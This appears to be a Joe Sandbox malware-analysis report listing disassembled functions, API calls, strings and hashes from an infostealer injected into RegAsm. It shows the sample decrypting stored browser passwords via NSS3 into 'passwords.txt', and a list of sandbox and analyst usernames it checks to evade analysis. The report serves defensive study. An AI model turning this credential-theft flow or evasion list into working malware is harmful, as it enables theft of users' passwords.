Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
Instruction ID: 5941d710df6caaa93d6ffa2de60dce8e613dec4f923ccdd24a2439a3e016513d
Opcode Fuzzy Hash: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
Instruction Fuzzy Hash: DAA002315569D48ECE53D7158260F207BB8A741A41F0504D1E491C6863C11CDA50D950

Function 0040DCA0 Relevance: 90.4, APIs: 60, Instructions: 399memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040DB7F: lstrlenA.KERNEL32(?,75AA5460,?,00000000), ref: 0040DBBB
Part of subcall function 0040DB7F: strchr.MSVCRT ref: 0040DBCD

GetProcessHeap.KERNEL32(00000008,?,75AA5460,?,00000000), ref: 0040DD04
HeapAlloc.KERNEL32(00000000), ref: 0040DD0B
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DD20
HeapFree.KERNEL32(00000000), ref: 0040DD27
strcpy_s.MSVCRT ref: 0040DD43
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DD55
HeapFree.KERNEL32(00000000), ref: 0040DD62
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040DD93
HeapFree.KERNEL32(00000000), ref: 0040DD9A
GetProcessHeap.KERNEL32(00000008,?), ref: 0040DDA1
HeapAlloc.KERNEL32(00000000), ref: 0040DDA8
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DDBD
HeapFree.KERNEL32(00000000), ref: 0040DDC4
strcpy_s.MSVCRT ref: 0040DDDA
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DDEC
HeapFree.KERNEL32(00000000), ref: 0040DDF3
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040DE11
HeapFree.KERNEL32(00000000), ref: 0040DE18
GetProcessHeap.KERNEL32(00000008,?), ref: 0040DE1F
HeapAlloc.KERNEL32(00000000), ref: 0040DE26
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DE3B
HeapFree.KERNEL32(00000000), ref: 0040DE42
strcpy_s.MSVCRT ref: 0040DE52
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DE64
HeapFree.KERNEL32(00000000), ref: 0040DE6B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040DE93
HeapFree.KERNEL32(00000000), ref: 0040DE9A
GetProcessHeap.KERNEL32(00000008,?), ref: 0040DEA1
HeapAlloc.KERNEL32(00000000), ref: 0040DEA8
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DEC3
HeapFree.KERNEL32(00000000), ref: 0040DECA
strcpy_s.MSVCRT ref: 0040DEDD
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DEEF
HeapFree.KERNEL32(00000000), ref: 0040DEF6
lstrlenA.KERNEL32(00000000), ref: 0040DEFF
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0040DF15
HeapAlloc.KERNEL32(00000000), ref: 0040DF1C
lstrlenA.KERNEL32(00000000), ref: 0040DF34

Part of subcall function 0040F128: std::_Xinvalid_argument.LIBCPMT ref: 0040F13E

strcpy_s.MSVCRT ref: 0040DF75
GetProcessHeap.KERNEL32(00000000,?,00000001,00000001), ref: 0040DF9B
HeapFree.KERNEL32(00000000), ref: 0040DFA8
lstrlenA.KERNEL32(?), ref: 0040DFAD
GetProcessHeap.KERNEL32(00000008,00000001), ref: 0040DFBC
HeapAlloc.KERNEL32(00000000), ref: 0040DFC3
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DFD7
HeapFree.KERNEL32(00000000), ref: 0040DFDE
strcpy_s.MSVCRT ref: 0040DFEC
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DFF9
HeapFree.KERNEL32(00000000), ref: 0040E000
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E035
HeapFree.KERNEL32(00000000), ref: 0040E03C
GetProcessHeap.KERNEL32(00000008,?), ref: 0040E043
HeapAlloc.KERNEL32(00000000), ref: 0040E04A
strcpy_s.MSVCRT ref: 0040E065
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E077
HeapFree.KERNEL32(00000000), ref: 0040E07E
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E122
HeapFree.KERNEL32(00000000), ref: 0040E129
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E173
HeapFree.KERNEL32(00000000), ref: 0040E17A

Part of subcall function 0040DB7F: strchr.MSVCRT ref: 0040DBF2
Part of subcall function 0040DB7F: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC14
Part of subcall function 0040DB7F: GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC21
Part of subcall function 0040DB7F: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC28
Part of subcall function 0040DB7F: strcpy_s.MSVCRT ref: 0040DC6F

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$strchr$Xinvalid_argumentstd::_
String ID:
API String ID: 838878465-0
Opcode ID: d32d29dfa358a2ba15196c1412f8cd3877744c4acf70fa109f6e8bc0d06c3aa3
Instruction ID: a48f4a03c16046f7b10813d38cdedc39b3ce3a8b548cb54fb28bc9501807c529
Opcode Fuzzy Hash: d32d29dfa358a2ba15196c1412f8cd3877744c4acf70fa109f6e8bc0d06c3aa3
Instruction Fuzzy Hash: FCE14972C00219ABDF20AFF5DC88ADEBF79FF48305F20546AE106B3192CA3958849F55

Function 0040A916 Relevance: 61.5, APIs: 34, Strings: 1, Instructions: 211stringmemoryfileCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A922

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00437398,0043680B), ref: 0040A9C1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9D9
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9E1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9ED
??_U@YAPAXI@Z.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9F7
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA09
GetProcessHeap.KERNEL32(00000000,000F423F,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA15
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA1C
StrStrA.SHLWAPI(0040B824,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA2D
StrStrA.SHLWAPI(-00000010,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA47
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA5A
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA64
lstrcatA.KERNEL32(00000000,0043739C,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA70
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA7A
lstrcatA.KERNEL32(00000000,004373A0,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA86
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA93
lstrcatA.KERNEL32(00000000,-00000010,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA9B
lstrcatA.KERNEL32(00000000,004373A4,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAA7
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAB7
StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAC7
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AADA

Part of subcall function 0040A7D8: _memset.LIBCMT ref: 0040A815
Part of subcall function 0040A7D8: lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A830
Part of subcall function 0040A7D8: CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0040A838
Part of subcall function 0040A7D8: PK11_GetInternalKeySlot.NSS3(?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A846
Part of subcall function 0040A7D8: PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A85A
Part of subcall function 0040A7D8: PK11SDR_Decrypt.NSS3(?,?,00000000,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A89A
Part of subcall function 0040A7D8: _memmove.LIBCMT ref: 0040A8BB
Part of subcall function 0040A7D8: PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A8EC

lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAE9
lstrcatA.KERNEL32(00000000,004373A8,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAF5
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB05
StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB15
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB28

Part of subcall function 0040A7D8: lstrcatA.KERNEL32(00436803,00436807,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8E5
Part of subcall function 0040A7D8: lstrcatA.KERNEL32(00436803,0043680A,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8FB

lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB37
lstrcatA.KERNEL32(00000000,004373AC,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB43
lstrcatA.KERNEL32(00000000,004373B0,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB4F
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB5F
lstrlenA.KERNEL32(00000000), ref: 0040AB7D
CloseHandle.KERNEL32(?), ref: 0040ABAC
NSS_Shutdown.NSS3(?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040ABB2

Strings

passwords.txt, xrefs: 0040AB89

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$File$lstrcpy$K11_lstrlen$HeapPointerSlot$AllocAuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalProcessReadShutdownSizeString_memmove_memset
String ID: passwords.txt
API String ID: 2725232238-347816968
Opcode ID: bb064b8298d6f242af2608160483fe0b7f960e9ebf521ae0aecda0f156aec49c
Instruction ID: 01fbc97008b5f919d0f4f38835496cb92152393c61082b73c5fbbe28755775e8
Opcode Fuzzy Hash: bb064b8298d6f242af2608160483fe0b7f960e9ebf521ae0aecda0f156aec49c
Instruction Fuzzy Hash: 36717132500205ABCB21EFA5ED4AD9E3B7AEF4930AF001015FA01A31E1CB785945DBA5

Function 00424A77 Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00424A7F
__mtterm.LIBCMT ref: 00424A8B

Part of subcall function 0042474A: DecodePointer.KERNEL32(FFFFFFFF), ref: 0042475B
Part of subcall function 0042474A: TlsFree.KERNEL32(FFFFFFFF), ref: 00424775

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00424AA1
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00424AAE
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00424ABB
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00424AC8
TlsAlloc.KERNEL32 ref: 00424B18
TlsSetValue.KERNEL32(00000000), ref: 00424B33
__init_pointers.LIBCMT ref: 00424B3D
EncodePointer.KERNEL32 ref: 00424B4E
EncodePointer.KERNEL32 ref: 00424B5B
EncodePointer.KERNEL32 ref: 00424B68
EncodePointer.KERNEL32 ref: 00424B75
DecodePointer.KERNEL32(Function_000248CE), ref: 00424B96
__calloc_crt.LIBCMT ref: 00424BAB
DecodePointer.KERNEL32(00000000), ref: 00424BC5
__initptd.LIBCMT ref: 00424BD0
GetCurrentThreadId.KERNEL32 ref: 00424BD7

Strings

KERNEL32.DLL, xrefs: 00424A7A
FlsAlloc, xrefs: 00424A9B
FlsFree, xrefs: 00424ABD
FlsSetValue, xrefs: 00424AB0
FlsGetValue, xrefs: 00424AA3

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3732613303-3819984048
Opcode ID: 2896d70a30e4e1ffef7eebf45ea06d0c4ead9ab426b75e9f9fce876e37ab14f7
Instruction ID: 932ba5145e5f9663d04d2b2c658c5551f6ee9133192f05e79dd13dddd43acee6
Opcode Fuzzy Hash: 2896d70a30e4e1ffef7eebf45ea06d0c4ead9ab426b75e9f9fce876e37ab14f7
Instruction Fuzzy Hash: D5315B75E053649ACB206F75BC08A1A3FA4EF95722B91063BE418D32B1D779E482CF5C

Function 6C1B4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C1A4F51,00000000), ref: 6C1B4C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C1A4F51,00000000), ref: 6C1B4C5B
PR_smprintf.NSS3(6C28AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C1A4F51,00000000), ref: 6C1B4C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C1A4F51,00000000), ref: 6C1B4CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C1B4CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C1B4CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C1B4D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C1A4F51,00000000), ref: 6C1B4D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C1A4F51,00000000), ref: 6C1B4D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C1B4D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C1B4DA2
free.MOZGLUE(?), ref: 6C1B4DB9
free.MOZGLUE(00000000), ref: 6C1B4DCF

Strings

ootT, xrefs: 6C1B4D1A
0x%08lx=[%s %s], xrefs: 6C1B4D80
every, xrefs: 6C1B4CA1
%s,%s, xrefs: 6C1B4C4B
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6C1B4D9D
any, xrefs: 6C1B4C96
rootFlags, xrefs: 6C1B4D47
rust, xrefs: 6C1B4D22
timeout, xrefs: 6C1B4C91
slotFlags, xrefs: 6C1B4D34

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: e122d30123fd300df13875d9fed56f7e1bc90b88fd8802e30b2cbf164af2fe60
Instruction ID: 2d154060df22d9b97a8fee4464cccf6c3461d12c4bdbb78f3b8d5cbd517c622d
Opcode Fuzzy Hash: e122d30123fd300df13875d9fed56f7e1bc90b88fd8802e30b2cbf164af2fe60
Instruction Fuzzy Hash: A7417DB2A001459BD7119F589C446BF7765AF62718F04C124EC192BB81E731E828CFE3

Function 00401927 Relevance: 36.8, APIs: 2, Strings: 19, Instructions: 56stringCOMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 00401A13
lstrcmpiA.KERNEL32(0043ABC0,?), ref: 00401A2E

Strings

WDAGUtilityAccount, xrefs: 004019FF
test user, xrefs: 004019E1
HAPUBWS, xrefs: 00401969
IT-ADMIN, xrefs: 0040197D
Miller, xrefs: 00401991
CurrentUser, xrefs: 0040194B
milozs, xrefs: 0040199B
Peter Wilson, xrefs: 004019A5
Emily, xrefs: 0040195F
Hong Lee, xrefs: 00401973
Johnson, xrefs: 00401987
sandbox, xrefs: 004019C3
malware, xrefs: 004019CD
timmy, xrefs: 004019AF
virus, xrefs: 004019EB
user, xrefs: 004019B9
Sand box, xrefs: 00401955
maltest, xrefs: 004019D7
John Doe, xrefs: 004019F5

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: NameUserlstrcmpi
String ID: CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sand box$WDAGUtilityAccount$maltest$malware$milozs$sandbox$test user$timmy$user$virus
API String ID: 542268695-1784693376
Opcode ID: 7cef0210b80d916d7f2358703c4ca6c8abf34f8581b0d4cf4443c8a38c176629
Instruction ID: c38b1e10a2449cf700662c7d225d432ab5fb229da42a5f31f88fffdc07420ec6
Opcode Fuzzy Hash: 7cef0210b80d916d7f2358703c4ca6c8abf34f8581b0d4cf4443c8a38c176629
Instruction Fuzzy Hash: 7521D1B194122C8BCB60CF159C487DDBBB5BB49308F40B1DA9589BA250C7B85AD9CF89

Function 6C1B0550 Relevance: 35.2, APIs: 13, Strings: 7, Instructions: 182stringCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(NSS_ALLOW_WEAK_SIGNATURE_ALG,00000002,00000000,?,6C195989), ref: 6C1B0571

Part of subcall function 6C141240: TlsGetValue.KERNEL32(00000040,?,6C14116C,NSPR_LOG_MODULES), ref: 6C141267
Part of subcall function 6C141240: EnterCriticalSection.KERNEL32(?,?,?,6C14116C,NSPR_LOG_MODULES), ref: 6C14127C
Part of subcall function 6C141240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C14116C,NSPR_LOG_MODULES), ref: 6C141291
Part of subcall function 6C141240: PR_Unlock.NSS3(?,?,?,?,6C14116C,NSPR_LOG_MODULES), ref: 6C1412A0

PR_GetEnvSecure.NSS3(NSS_HASH_ALG_SUPPORT,?,00000002,00000000,?,6C195989), ref: 6C1B05B7
PORT_Strdup_Util.NSS3(00000000,?,?,00000002,00000000,?,6C195989), ref: 6C1B05C8
strchr.VCRUNTIME140(00000000,0000003B,?,?,?,00000002,00000000,?,6C195989), ref: 6C1B05EC
strstr.VCRUNTIME140(00000001,?), ref: 6C1B0653
free.MOZGLUE(?,?,?,?,00000002,00000000,?,6C195989), ref: 6C1B0681
PORT_NewArena_Util.NSS3(00000800,?,?,?,?,00000002,00000000,?,6C195989), ref: 6C1B06AB
PL_NewHashTable.NSS3(00000000,6C1AFE80,?,6C1FC350,00000000,00000000,?,?,?,?,?,00000002,00000000,?,6C195989), ref: 6C1B06D5
PL_NewHashTable.NSS3(00000000,?,6C1FC350,6C1FC350,00000000,00000000), ref: 6C1B06EC
PL_HashTableAdd.NSS3(?,6C27E618,6C27E618), ref: 6C1B070F

Part of subcall function 6C0D2DF0: PL_HashTableRawAdd.NSS3(?,?,?,?,?), ref: 6C0D2E35

PL_HashTableAdd.NSS3(FFFFFFFF,6C27E618), ref: 6C1B0738
PL_HashTableAdd.NSS3(6C27E634,6C27E634), ref: 6C1B0752
PR_SetError.NSS3(FFFFE001,00000000,?,?,?,?,00000002,00000000,?,6C195989), ref: 6C1B0767

Strings

$+l, xrefs: 6C1B0645
dynamic OID data, xrefs: 6C1B068A
V, xrefs: 6C1B0559
NSS_ALLOW_WEAK_SIGNATURE_ALG, xrefs: 6C1B056C
NSS_HASH_ALG_SUPPORT, xrefs: 6C1B05B2
flags, xrefs: 6C1B0555
4'l, xrefs: 6C1B071B

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: HashTable$SecureUtil$Arena_CriticalEnterErrorSectionStrdup_UnlockValuefreegetenvstrchrstrstr
String ID: 4'l$NSS_ALLOW_WEAK_SIGNATURE_ALG$NSS_HASH_ALG_SUPPORT$V$dynamic OID data$flags$$+l
API String ID: 514890423-46766220
Opcode ID: 62e9714c5de6bb5e22a1ce6cb552c13aaacc882adca04874451f772f296dbceb
Instruction ID: b09d4e8a6d2cba5456a4f641a77b1e243ab703da8f44f3ccada68401f5de564b
Opcode Fuzzy Hash: 62e9714c5de6bb5e22a1ce6cb552c13aaacc882adca04874451f772f296dbceb
Instruction Fuzzy Hash: A551F1F1E013865BEB109B258E0CB677AB4AB9235CF180529DC18E7B81F731D506CFA5

Function 6C192D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C192DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C192E00
